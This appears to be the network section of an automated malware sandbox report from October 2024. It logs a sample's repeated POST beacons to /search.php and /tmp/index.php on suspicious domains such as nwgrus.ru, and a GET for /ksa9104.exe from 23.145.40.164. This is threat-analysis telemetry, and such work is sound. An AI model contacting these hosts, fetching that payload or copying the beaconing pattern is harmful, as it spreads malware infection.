                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://uheybmputpop.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 267Host: bestworldhools.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://glhqomjbdpj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://xnhhfayqvhtyngw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: bestworldhools.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://hptbtnqwmmhbw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 264Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://klstdrudvxhgouey.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: bestworldhools.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://dtojnsdaxdil.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 300Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://mwlktdttfgqo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: bestworldhools.com
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bmrvdxbbdeon.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hkxxphsdfyiakovt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 350Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hgegifhrmen.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 174Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jqmiciumjrg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 142Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xlakrjktmvagfqhe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cvqgcpbdqadirwgw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rhtihevserv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xvhoixsulem.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 149Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eywbfvbvilup.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://garnufhrqshsv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 251Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jpqykkhyhkjhpkd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 186Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ctxuhanhwfs.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ncglteyuwoqfog.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uknyifxswcdyll.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pxdktwwwgewqlyba.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 247Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://emasrygonyft.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pwvfxidmiqrrd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 219Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gcmljhlsnyknod.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 256Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://emsfvchaaieje.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 120Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://goboxcgfexx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ruprlmkhoul.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://isbmdtufnkfjsgc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 342Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dkfsbqntnihxbnlu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aiwrtqoespykiwu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://isyxarorgwntyxfd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 186Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://busntnknves.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ewcutxkdkeyvacp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lwocwqbtqohnf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tiisncfdrpaiu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gieumfrwvwjruuah.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 114Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hkihwrdtvsi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bqpiqprsuajpd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 149Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fsqorqnhaeehy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eihhylujhlro.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 360Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qcgaudpuoiuttos.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mhqikqiwjyotw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dymavinnaeuaxxm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 346Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xuqynkrewbaraj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 238Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://niarphxxbktdxvwh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lqpnyjpucaq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 132Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://akokgrlutaukqvq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: nwgrus.ru
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
                Source: global trafficHTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
                Source: global trafficDNS traffic detected: DNS query: nwgrus.ru
                Source: global trafficDNS traffic detected: DNS query: calvinandhalls.com
                Source: global trafficDNS traffic detected: DNS query: bestworldhools.com
                Source: unknownHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://qchnpedxxogxdjn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 0Content-Type: application/octet-streamDate: Mon, 07 Oct 2024 13:00:14 GMTConnection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 0Content-Type: application/octet-streamDate: Mon, 07 Oct 2024 13:00:17 GMTConnection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 0Content-Type: application/octet-streamDate: Mon, 07 Oct 2024 13:01:32 GMTConnection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 0Content-Type: application/octet-streamDate: Mon, 07 Oct 2024 13:01:33 GMTConnection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 0Content-Type: application/octet-streamDate: Mon, 07 Oct 2024 13:01:55 GMTConnection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 0Content-Type: application/octet-streamDate: Mon, 07 Oct 2024 13:01:56 GMTConnection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 0Content-Type: application/octet-streamDate: Mon, 07 Oct 2024 13:02:16 GMTConnection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 0Content-Type: application/octet-streamDate: Mon, 07 Oct 2024 13:02:17 GMTConnection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 0Content-Type: application/octet-streamDate: Mon, 07 Oct 2024 13:02:39 GMTConnection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 0Content-Type: application/octet-streamDate: Mon, 07 Oct 2024 13:02:40 GMTConnection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 0Content-Type: application/octet-streamDate: Mon, 07 Oct 2024 13:03:02 GMTConnection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 0Content-Type: application/octet-streamDate: Mon, 07 Oct 2024 13:03:03 GMTConnection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 87 ee Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
